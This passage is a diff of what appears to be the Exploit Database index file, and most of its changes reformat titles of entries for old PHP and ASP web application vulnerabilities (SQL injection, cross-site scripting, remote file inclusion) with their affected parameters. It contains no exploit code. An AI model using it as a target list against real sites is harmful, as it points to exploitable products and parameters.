SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps,0 +26136,platforms/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 - 'edit_event.php?eventid' SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps,0 26140,platforms/php/webapps/26140.txt,"ezUpload 2.2 - 'index.php' path Parameter Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 -26141,platforms/php/webapps/26141.txt,"ezUpload 2.2 - initialize.php path Parameter Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 -26142,platforms/php/webapps/26142.txt,"ezUpload 2.2 - customize.php path Parameter Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 -26143,platforms/php/webapps/26143.txt,"ezUpload 2.2 - form.php path Parameter Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 +26141,platforms/php/webapps/26141.txt,"ezUpload 2.2 - 'initialize.php?path' Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 +26142,platforms/php/webapps/26142.txt,"ezUpload 2.2 - 'customize.php?path' Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 +26143,platforms/php/webapps/26143.txt,"ezUpload 2.2 - 'form.php?path' Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 26144,platforms/php/webapps/26144.txt,"PHPTB Topic Board 2.0 - 'index.php' mid Parameter SQL Injection",2005-08-10,abducter_minds@yahoo.com,php,webapps,0 26146,platforms/php/webapps/26146.txt,"VegaDNS 0.8.1/0.9.8/0.9.9 - 'index.php' Cross-Site Scripting",2005-08-10,dyn0,php,webapps,0 -26147,platforms/php/webapps/26147.txt,"MyBulletinBoard (MyBB) RC4 - 'Username' Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 -26148,platforms/php/webapps/26148.txt,"MyBulletinBoard (MyBB) RC4 - 'member.php' Multiple Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 -26149,platforms/php/webapps/26149.txt,"MyBulletinBoard (MyBB) RC4 - 'polloptions' Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 -26150,platforms/php/webapps/26150.txt,"MyBulletinBoard (MyBB) RC4 - 'action' Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 -26153,platforms/php/webapps/26153.txt,"My Image Gallery 1.4.1 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-08-16,anonymous,php,webapps,0 +26147,platforms/php/webapps/26147.txt,"MyBulletinBoard (MyBB) RC4 - 'Username' SQL Injection",2005-08-12,phuket,php,webapps,0 +26148,platforms/php/webapps/26148.txt,"MyBulletinBoard (MyBB) RC4 - 'member.php' Multiple SQL Injections",2005-08-12,phuket,php,webapps,0 +26149,platforms/php/webapps/26149.txt,"MyBulletinBoard (MyBB) RC4 - 'polloptions' SQL Injection",2005-08-12,phuket,php,webapps,0 +26150,platforms/php/webapps/26150.txt,"MyBulletinBoard (MyBB) RC4 - 'action' SQL Injection",2005-08-12,phuket,php,webapps,0 +26153,platforms/php/webapps/26153.txt,"My Image Gallery 1.4.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-16,anonymous,php,webapps,0 26154,platforms/asp/webapps/26154.txt,"PersianBlog - Userslist.asp SQL Injection",2005-08-16,trueend5,asp,webapps,0 26155,platforms/php/webapps/26155.txt,"Soft4e ECW-Shop 6.0.2 - 'index.php' SQL Injection",2005-08-16,"John Cobb",php,webapps,0 26156,platforms/asp/webapps/26156.txt,"CPaint 1.3 - xmlhttp Request Input Validation",2005-08-16,"Thor Larholm",asp,webapps,0 26157,platforms/php/webapps/26157.txt,"ECW Shop 6.0.2 - 'index.php' Cross-Site Scripting",2005-08-16,"John Cobb",php,webapps,0 26158,platforms/php/webapps/26158.txt,"Soft4e ECW-Shop 6.0.2 - 'index.php' HTML Injection",2005-08-16,"John Cobb",php,webapps,0 26159,platforms/php/webapps/26159.txt,"PHPFreeNews 1.40 - searchresults.php Multiple SQL Injections",2005-08-17,h4cky,php,webapps,0 -26160,platforms/php/webapps/26160.txt,"PHPFreeNews 1.40 - NewsCategoryForm.php NewsMode Parameter Cross-Site Scripting",2005-08-17,h4cky,php,webapps,0 -26161,platforms/php/webapps/26161.txt,"PHPFreeNews 1.40 - searchresults.php Multiple Parameter Cross-Site Scripting",2005-08-17,h4cky,php,webapps,0 -26162,platforms/php/webapps/26162.txt,"PHPTB Topic Board 2.0 - admin_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 -26163,platforms/php/webapps/26163.txt,"PHPTB Topic Board 2.0 - board_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 -26164,platforms/php/webapps/26164.txt,"PHPTB Topic Board 2.0 - dev_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 -26165,platforms/php/webapps/26165.txt,"PHPTB Topic Board 2.0 - file_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 -26166,platforms/php/webapps/26166.txt,"PHPTB Topic Board 2.0 - tech_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 +26160,platforms/php/webapps/26160.txt,"PHPFreeNews 1.40 - 'NewsCategoryForm.php?NewsMode' Cross-Site Scripting",2005-08-17,h4cky,php,webapps,0 +26161,platforms/php/webapps/26161.txt,"PHPFreeNews 1.40 - 'searchresults.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-17,h4cky,php,webapps,0 +26162,platforms/php/webapps/26162.txt,"PHPTB Topic Board 2.0 - 'admin_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 +26163,platforms/php/webapps/26163.txt,"PHPTB Topic Board 2.0 - 'board_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 +26164,platforms/php/webapps/26164.txt,"PHPTB Topic Board 2.0 - 'dev_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 +26165,platforms/php/webapps/26165.txt,"PHPTB Topic Board 2.0 - 'file_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 +26166,platforms/php/webapps/26166.txt,"PHPTB Topic Board 2.0 - 'tech_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 26169,platforms/php/webapps/26169.txt,"W-Agora 4.2 - Site Parameter Directory Traversal",2005-08-18,matrix_killer,php,webapps,0 26170,platforms/php/webapps/26170.txt,"ATutor 1.5.1 - 'login.php' course Parameter Cross-Site Scripting",2005-08-18,matrix_killer,php,webapps,0 26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 - Prod.php Arbitrary Command Execution",2005-08-18,rgod,php,webapps,0 26172,platforms/php/webapps/26172.txt,"Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities",2005-08-19,anonymous,php,webapps,0 26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez_ Lopez_ Castillo",hardware,webapps,0 26176,platforms/php/webapps/26176.txt,"Woltlab Burning Board 2.x - ModCP.php SQL Injection",2005-08-20,[R],php,webapps,0 -26177,platforms/php/webapps/26177.txt,"Land Down Under 800/801 - links.php w Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0 -26178,platforms/php/webapps/26178.txt,"Land Down Under 800/801 - journal.php m Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0 -26179,platforms/php/webapps/26179.txt,"Land Down Under 800/801 - list.php Multiple Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0 -26180,platforms/php/webapps/26180.txt,"Land Down Under 800/801 - forums.php Multiple Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0 -26181,platforms/php/webapps/26181.txt,"Land Down Under 800 - journal.php w Parameter Cross-Site Scripting",2005-08-20,bl2k,php,webapps,0 -26182,platforms/php/webapps/26182.txt,"Land Down Under 800 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-08-20,bl2k,php,webapps,0 +26177,platforms/php/webapps/26177.txt,"Land Down Under 800/801 - 'links.php?w' SQL Injection",2005-08-20,bl2k,php,webapps,0 +26178,platforms/php/webapps/26178.txt,"Land Down Under 800/801 - 'journal.php?m' SQL Injection",2005-08-20,bl2k,php,webapps,0 +26179,platforms/php/webapps/26179.txt,"Land Down Under 800/801 - 'list.php' Multiple SQL Injections",2005-08-20,bl2k,php,webapps,0 +26180,platforms/php/webapps/26180.txt,"Land Down Under 800/801 - 'forums.php' Multiple SQL Injections",2005-08-20,bl2k,php,webapps,0 +26181,platforms/php/webapps/26181.txt,"Land Down Under 800 - 'journal.php?w' Cross-Site Scripting",2005-08-20,bl2k,php,webapps,0 +26182,platforms/php/webapps/26182.txt,"Land Down Under 800 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-20,bl2k,php,webapps,0 26183,platforms/php/webapps/26183.txt,"NEPHP 3.0.4 - browse.php Cross-Site Scripting",2005-08-22,bl2k,php,webapps,0 26184,platforms/php/webapps/26184.txt,"PHPKit 1.6.1 - 'member.php' SQL Injection",2005-08-22,phuket,php,webapps,0 26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 Module Newbb_plus/Messages - SQL Injection",2005-08-22,"James Bercegay",php,webapps,0 26187,platforms/php/webapps/26187.txt,"PostNuke 0.76 RC4b - Comments Module moderate Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 -26188,platforms/php/webapps/26188.txt,"PostNuke 0.76 RC4b - user.php htmltext Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 +26188,platforms/php/webapps/26188.txt,"PostNuke 0.76 RC4b - 'user.php?htmltext' Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26189,platforms/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL - viewdownload.php SQL Injection",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26190,platforms/php/webapps/26190.txt,"SaveWebPortal 3.4 - Unauthorized Access",2005-08-23,rgod,php,webapps,0 -26191,platforms/php/webapps/26191.txt,"SaveWebPortal 3.4 - Multiple Remote File Inclusion",2005-08-23,rgod,php,webapps,0 +26191,platforms/php/webapps/26191.txt,"SaveWebPortal 3.4 - Multiple Remote File Inclusions",2005-08-23,rgod,php,webapps,0 26192,platforms/php/webapps/26192.txt,"SaveWebPortal 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2005-08-23,rgod,php,webapps,0 26193,platforms/php/webapps/26193.txt,"SaveWebPortal 3.4 - Multiple Directory Traversal Vulnerabilities",2005-08-23,rgod,php,webapps,0 26197,platforms/php/webapps/26197.txt,"Foojan PHPWeblog - Html Injection",2005-08-24,ali202,php,webapps,0 @@ -28858,8 +28859,8 @@ id,file,description,date,author,platform,type,port 26203,platforms/php/webapps/26203.php,"Looking Glass 20040427 - Remote Command Execution",2005-08-27,rgod,php,webapps,0 26204,platforms/php/webapps/26204.pl,"MyBB - member.php SQL Injection",2005-08-29,W7ED,php,webapps,0 26205,platforms/php/webapps/26205.txt,"Land Down Under 700/701/800/801 - 'index.php' c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 -26206,platforms/php/webapps/26206.txt,"Land Down Under 700/701/800/801 - events.php c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 -26207,platforms/php/webapps/26207.txt,"Land Down Under 700/701/800/801 - list.php Multiple Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 +26206,platforms/php/webapps/26206.txt,"Land Down Under 700/701/800/801 - 'events.php?c' SQL Injection",2005-08-29,matrix_killer,php,webapps,0 +26207,platforms/php/webapps/26207.txt,"Land Down Under 700/701/800/801 - 'list.php' Multiple SQL Injections",2005-08-29,matrix_killer,php,webapps,0 26208,platforms/php/webapps/26208.txt,"Autolinks 2.1 Pro - 'Al_initialize.php' Remote File Inclusion",2005-08-29,4Degrees,php,webapps,0 26209,platforms/php/webapps/26209.txt,"PHP-Fusion 4.0/5.0/6.0 - BBCode URL Tag Script Injection",2005-08-29,slacker4ever_1,php,webapps,0 26211,platforms/php/webapps/26211.txt,"phpLDAPadmin 0.9.6/0.9.7 - 'welcome.php' Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0 @@ -28876,8 +28877,8 @@ id,file,description,date,author,platform,type,port 26231,platforms/php/webapps/26231.txt,"PBLang 4.65 Bulletin Board System - SetCookie.php Directory Traversal",2005-09-07,rgod,php,webapps,0 26232,platforms/php/webapps/26232.txt,"phpCommunityCalendar 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-07,rgod,php,webapps,0 26234,platforms/php/webapps/26234.txt,"Stylemotion WEB//NEWS 1.4 - startup.php Cookie SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 -26235,platforms/php/webapps/26235.txt,"Stylemotion WEB//NEWS 1.4 - news.php Multiple Parameter SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 -26236,platforms/php/webapps/26236.txt,"Stylemotion WEB//NEWS 1.4 - print.php id Parameter SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 +26235,platforms/php/webapps/26235.txt,"Stylemotion WEB//NEWS 1.4 - 'news.php' Multiple SQL Injections",2005-09-08,onkel_fisch,php,webapps,0 +26236,platforms/php/webapps/26236.txt,"Stylemotion WEB//NEWS 1.4 - 'print.php?id' SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 26237,platforms/php/webapps/26237.txt,"AMember Pro 2.3.4 - Remote File Inclusion",2005-09-08,"NewAngels Team",php,webapps,0 26240,platforms/php/webapps/26240.txt,"WordPress Plugin Ultimate WordPress Auction Plugin 1.0 - Cross-Site Request Forgery",2013-06-17,expl0i13r,php,webapps,0 26241,platforms/php/webapps/26241.txt,"Fly-High CMS 2012-07-08 - Unrestricted Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps,0 @@ -28887,8 +28888,8 @@ id,file,description,date,author,platform,type,port 26247,platforms/php/webapps/26247.txt,"MyBulletinBoard (MyBB) 1.0 - 'RateThread.php' SQL Injection",2005-09-09,stranger-killer,php,webapps,0 40300,platforms/php/webapps/40300.py,"HelpDeskZ 1.0.2 - Unauthenticated Arbitrary File Upload",2016-08-29,"Lars Morgenroth",php,webapps,80 26252,platforms/php/webapps/26252.txt,"Subscribe Me Pro 2.44 - S.pl Directory Traversal",2005-09-13,h4cky0u,php,webapps,0 -26253,platforms/php/webapps/26253.txt,"Land Down Under 800/801 - auth.php m Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0 -26254,platforms/php/webapps/26254.txt,"Land Down Under 800/801 - plug.php e Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0 +26253,platforms/php/webapps/26253.txt,"Land Down Under 800/801 - 'auth.php?m' SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0 +26254,platforms/php/webapps/26254.txt,"Land Down Under 800/801 - 'plug.php?e' SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0 26255,platforms/php/webapps/26255.php,"Mail-it Now! Upload2Server 1.5 - Arbitrary File Upload",2005-09-13,rgod,php,webapps,0 26256,platforms/cgi/webapps/26256.txt,"MIVA Merchant 5 - Merchant.MVC Cross-Site Scripting",2005-09-14,admin@hyperconx.com,cgi,webapps,0 26257,platforms/php/webapps/26257.txt,"ATutor 1.5.1 - 'password_reminder.php' SQL Injection",2005-09-14,rgod,php,webapps,0 @@ -28904,28 +28905,28 @@ id,file,description,date,author,platform,type,port 26267,platforms/php/webapps/26267.txt,"DeluxeBB 1.0 - 'pm.php' SQL Injection",2005-09-15,abducter,php,webapps,0 26268,platforms/php/webapps/26268.txt,"DeluxeBB 1.0 - 'newpost.php' SQL Injection",2005-09-15,abducter,php,webapps,0 26333,platforms/asp/webapps/26333.html,"Aenovo - '/Password/default.asp Password' SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 -26334,platforms/asp/webapps/26334.txt,"Aenovo - '/incs/searchdisplay.asp strSQL' Parameter SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 +26334,platforms/asp/webapps/26334.txt,"Aenovo - '/incs/searchdisplay.asp?strSQL' SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 26270,platforms/php/webapps/26270.txt,"Content2Web 1.0.1 - Multiple Input Validation Vulnerabilities",2005-09-16,"Security Tester",php,webapps,0 26272,platforms/php/webapps/26272.txt,"EPay Pro 2.0 - 'index.php' Directory Traversal",2005-09-19,h4cky0u,php,webapps,0 -26273,platforms/php/webapps/26273.txt,"vBulletin 1.0.1 lite/2.x/3.0 - joinrequests.php request Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 -26274,platforms/php/webapps/26274.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php' Multiple Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 -26275,platforms/php/webapps/26275.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertitle.php usertitleid' Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 -26276,platforms/php/webapps/26276.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertools.php ids' Parameter SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 +26273,platforms/php/webapps/26273.txt,"vBulletin 1.0.1 lite/2.x/3.0 - 'joinrequests.php?request' SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 +26274,platforms/php/webapps/26274.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php' Multiple SQL Injections",2005-09-19,deluxe@security-project.org,php,webapps,0 +26275,platforms/php/webapps/26275.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertitle.php?usertitleid' SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 +26276,platforms/php/webapps/26276.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertools.php?ids' SQL Injection",2005-09-19,deluxe@security-project.org,php,webapps,0 26277,platforms/php/webapps/26277.txt,"NooToplist 1.0 - 'index.php' Multiple SQL Injections",2005-09-19,"David Sopas Ferreira",php,webapps,0 -26278,platforms/php/webapps/26278.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/css.php group' Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26279,platforms/php/webapps/26279.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/index.php' Multiple Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26280,platforms/php/webapps/26280.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php email' Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26281,platforms/php/webapps/26281.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/language.php goto' Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26282,platforms/php/webapps/26282.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/modlog.php orderby' Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 -26283,platforms/php/webapps/26283.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/template.php' Multiple Parameter Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26278,platforms/php/webapps/26278.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/css.php?group' Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26279,platforms/php/webapps/26279.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-09-19,deluxe@security-project.org,php,webapps,0 +26280,platforms/php/webapps/26280.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php?email' Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26281,platforms/php/webapps/26281.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/language.php?goto' Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26282,platforms/php/webapps/26282.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/modlog.php?orderby' Cross-Site Scripting",2005-09-19,deluxe@security-project.org,php,webapps,0 +26283,platforms/php/webapps/26283.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/template.php' Multiple Cross-Site Scripting Vulnerabilities",2005-09-19,deluxe@security-project.org,php,webapps,0 26284,platforms/php/webapps/26284.txt,"MX Shop 3.2 - 'index.php' Multiple SQL Injections",2005-09-19,"David Sopas Ferreira",php,webapps,0 26285,platforms/php/webapps/26285.txt,"Hesk 0.92/0.93 - Session ID Authentication Bypass",2005-09-20,"Rajesh Sethumadhavan",php,webapps,0 26286,platforms/php/webapps/26286.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Directory Traversal Vulnerabilities",2005-09-20,rgod,php,webapps,0 26287,platforms/php/webapps/26287.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-20,rgod,php,webapps,0 26300,platforms/php/webapps/26300.txt,"LucidCMS 2.0 - 'index.php' Cross-Site Scripting",2005-09-27,X1ngBox,php,webapps,0 26302,platforms/php/webapps/26302.txt,"TWiki TWikiUsers - INCLUDE Function Arbitrary Command Execution",2005-09-28,JChristophFuchs,php,webapps,0 -26303,platforms/php/webapps/26303.txt,"CubeCart 3.0.3 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-09-28,Lostmon,php,webapps,0 -26304,platforms/php/webapps/26304.txt,"CubeCart 3.0.3 - cart.php redir Parameter Cross-Site Scripting",2005-09-28,Lostmon,php,webapps,0 +26303,platforms/php/webapps/26303.txt,"CubeCart 3.0.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-09-28,Lostmon,php,webapps,0 +26304,platforms/php/webapps/26304.txt,"CubeCart 3.0.3 - 'cart.php?redir' Cross-Site Scripting",2005-09-28,Lostmon,php,webapps,0 26305,platforms/php/webapps/26305.txt,"SquirrelMail 1.4.2 Address Add Plugin - add.php Cross-Site Scripting",2005-09-29,anonymous,php,webapps,0 26307,platforms/php/webapps/26307.txt,"LucidCMS 2.0 - Login SQL Injection",2005-09-29,rgod,php,webapps,0 26308,platforms/php/webapps/26308.txt,"IceWarp Web Mail 5.5.1 - blank.html id Parameter Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps,0 @@ -28934,16 +28935,16 @@ id,file,description,date,author,platform,type,port 26311,platforms/php/webapps/26311.txt,"IceWarp Web Mail 5.5.1 - calendar_w.html createdataCX Parameter Cross-Site Scripting",2005-09-30,ss_contacts,php,webapps,0 26312,platforms/php/webapps/26312.txt,"EasyGuppy 4.5.4/4.5.5 - Printfaq.php Directory Traversal",2005-09-30,"Josh Zlatin-Amishav",php,webapps,0 26313,platforms/php/webapps/26313.txt,"Merak Mail Server 8.2.4 r - Arbitrary File Deletion",2005-09-30,ShineShadow,php,webapps,0 -26386,platforms/php/webapps/26386.txt,"Nuked-klaN 1.7 Forum Module - Multiple Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 -26387,platforms/php/webapps/26387.txt,"Nuked-klaN 1.7 Sections Module - 'artid' Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 +26386,platforms/php/webapps/26386.txt,"Nuked-klaN 1.7 Forum Module - Multiple SQL Injections",2005-10-24,papipsycho,php,webapps,0 +26387,platforms/php/webapps/26387.txt,"Nuked-klaN 1.7 Sections Module - 'artid' SQL Injection",2005-10-24,papipsycho,php,webapps,0 26316,platforms/php/webapps/26316.php,"imacs CMS 0.3.0 - Unrestricted Arbitrary File Upload",2013-06-19,"CWH Underground",php,webapps,0 26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh_ Mormoroth",php,webapps,0 -26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - 'footer.php' Multiple Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0 +26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - 'footer.php' Multiple Cross-Site Scripting Vulnerabilities",2005-10-07,rgod,php,webapps,0 26324,platforms/php/webapps/26324.txt,"TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-05,"Donnie Werner",php,webapps,0 26335,platforms/asp/webapps/26335.txt,"Aenovo - Multiple Unspecified Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",asp,webapps,0 26337,platforms/php/webapps/26337.php,"Cyphor 0.19 - 'lostpwd.php nick' SQL Injection",2005-10-08,rgod,php,webapps,0 -26338,platforms/php/webapps/26338.txt,"Cyphor 0.19 - 'newmsg.php fid' Parameter SQL Injection",2005-10-08,retrogod@aliceposta.it,php,webapps,0 -26339,platforms/php/webapps/26339.txt,"Cyphor 0.19 - 'footer.php t_login' Parameter Cross-Site Scripting",2005-10-08,retrogod@aliceposta.it,php,webapps,0 +26338,platforms/php/webapps/26338.txt,"Cyphor 0.19 - 'newmsg.php?fid' SQL Injection",2005-10-08,retrogod@aliceposta.it,php,webapps,0 +26339,platforms/php/webapps/26339.txt,"Cyphor 0.19 - 'footer.php?t_login' Cross-Site Scripting",2005-10-08,retrogod@aliceposta.it,php,webapps,0 26343,platforms/php/webapps/26343.txt,"Accelerated E Solutions - SQL Injection",2005-10-11,"Andysheh Soltani",php,webapps,0 26344,platforms/cgi/webapps/26344.txt,"WebGUI 6.x - Arbitrary Command Execution",2005-10-12,"David Maciejak",cgi,webapps,0 26345,platforms/php/webapps/26345.txt,"YaPiG 0.95b - 'view.php?img_size' Cross-Site Scripting",2005-10-13,enji@infosys.tuwien.ac.at,php,webapps,0 @@ -28954,15 +28955,15 @@ id,file,description,date,author,platform,type,port 26350,platforms/php/webapps/26350.txt,"PunBB 1.2.x - 'search.php' SQL Injection",2005-10-15,Devil_box,php,webapps,0 26351,platforms/asp/webapps/26351.txt,"Comersus Backoffice Plus - Multiple Cross-Site Scripting Vulnerabilities",2005-10-17,Lostmon,asp,webapps,0 26354,platforms/jsp/webapps/26354.txt,"NetFlow Analyzer 4 - Cross-Site Scripting",2005-10-18,why@nsfocus.com,jsp,webapps,0 -26355,platforms/php/webapps/26355.txt,"MySource 2.14 - upgrade_in_progress_backend.php target_url Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 -26356,platforms/php/webapps/26356.txt,"MySource 2.14 - insert_table.php bgcolor Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 -26357,platforms/php/webapps/26357.txt,"MySource 2.14 - edit_table_cell_props.php bgcolor Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 -26358,platforms/php/webapps/26358.txt,"MySource 2.14 - header.php bgcolor Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 -26359,platforms/php/webapps/26359.txt,"MySource 2.14 - edit_table_row_props.php bgcolor Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 -26360,platforms/php/webapps/26360.txt,"MySource 2.14 - edit_table_props.php bgcolor Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 -26361,platforms/php/webapps/26361.txt,"MySource 2.14 - edit_table_cell_type_wysiwyg.php Stylesheet Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 -26362,platforms/php/webapps/26362.txt,"MySource 2.14 - new_upgrade_functions.php Multiple Parameter Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26363,platforms/php/webapps/26363.txt,"MySource 2.14 - init_mysource.php INCLUDE_PATH Parameter Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26355,platforms/php/webapps/26355.txt,"MySource 2.14 - 'upgrade_in_progress_backend.php?target_url' Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 +26356,platforms/php/webapps/26356.txt,"MySource 2.14 - 'insert_table.php?bgcolor' Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 +26357,platforms/php/webapps/26357.txt,"MySource 2.14 - 'edit_table_cell_props.php?bgcolor' Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 +26358,platforms/php/webapps/26358.txt,"MySource 2.14 - 'header.php?bgcolor' Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 +26359,platforms/php/webapps/26359.txt,"MySource 2.14 - 'edit_table_row_props.php?bgcolor' Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 +26360,platforms/php/webapps/26360.txt,"MySource 2.14 - 'edit_table_props.php?bgcolor' Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 +26361,platforms/php/webapps/26361.txt,"MySource 2.14 - 'edit_table_cell_type_wysiwyg.php?Stylesheet' Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 +26362,platforms/php/webapps/26362.txt,"MySource 2.14 - 'new_upgrade_functions.php' Multiple Remote File Inclusions",2005-10-18,"Secunia Research",php,webapps,0 +26363,platforms/php/webapps/26363.txt,"MySource 2.14 - 'init_mysource.php?INCLUDE_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26364,platforms/php/webapps/26364.txt,"MySource 2.14 - 'Socket.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26365,platforms/php/webapps/26365.txt,"MySource 2.14 - 'Request.php PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26366,platforms/php/webapps/26366.txt,"GLPI 0.83.8 - Multiple 